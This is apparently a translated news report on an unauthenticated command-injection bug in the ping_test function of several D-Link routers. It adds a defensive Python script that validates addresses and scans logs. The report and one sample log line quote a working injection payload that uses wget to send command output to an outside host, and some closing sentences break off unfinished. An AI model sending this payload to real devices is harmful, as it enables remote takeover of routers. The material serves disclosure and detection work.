In D-Link wireless routers
Interestingly, the firmware developers intended the "ping_test" call to be reachable only after authentication, but in fact it is executed in any case, regardless of whether the user has logged in to the web interface. Specifically, when the apply_sec.cgi script is requested with the "action=ping_test" parameter, it redirects to the authentication page, yet at the same time performs the action associated with ping_test. To execute code, a second vulnerability in ping_test itself was used: it calls the ping utility without properly validating the IP address passed in for testing. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)".
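As an added illustration (not code from the article or from D-Link), the following script shows the two defensive sides of this bug: the strict address check that the ping_test handler should have applied, and a log scan that flags apply_sec.cgi requests whose ping_ipaddr is anything other than a plain IPv4 literal. The log lines are constructed samples in a common web-server format; the path and parameter names are the ones the article describes.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real traffic). The second one carries the
# newline-injected ping_ipaddr value described in the article.
LOG_LINES = [
    '203.0.113.5 - - [01/Oct/2019:10:00:00 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=8.8.8.8 HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Oct/2019:10:01:00 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/ HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Oct/2019:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def is_strict_ipv4(value: str) -> bool:
    """The check the handler should perform: accept only a dotted-quad IPv4
    literal. Whitespace, newlines, shell metacharacters or hostnames fail."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def suspicious_ping_test(line: str):
    """Return a finding for a ping_test request whose ping_ipaddr is not a
    clean IPv4 address, otherwise None. parse_qs percent-decodes the value,
    so an encoded %0a becomes a real newline here."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/apply_sec.cgi"):
        return None
    params = parse_qs(parts.query)
    if params.get("action") != ["ping_test"]:
        return None
    target = params.get("ping_ipaddr", [""])[0]
    if is_strict_ipv4(target):
        return None
    return {"client": line.split()[0], "ping_ipaddr": target}


def scan(lines):
    """Run the check over a list of log lines and collect the findings."""
    return [hit for hit in (suspicious_ping_test(l) for l in lines) if hit]


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

Because the handler runs before authentication on affected firmware, any ping_test request from an untrusted network is worth reviewing even when the address is well-formed; this scan only singles out the injection pattern.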
The presence of the vulnerability is officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or older;
- DIR-866L with firmware 1.03b04 or older;
- DIR-1565 with firmware 1.01 or older;
- DIR-652 (the affected firmware versions are not specified)
The support time for these models has already expired, so D-Link
Later it turned out that the vulnerability also
Source: opennet.ru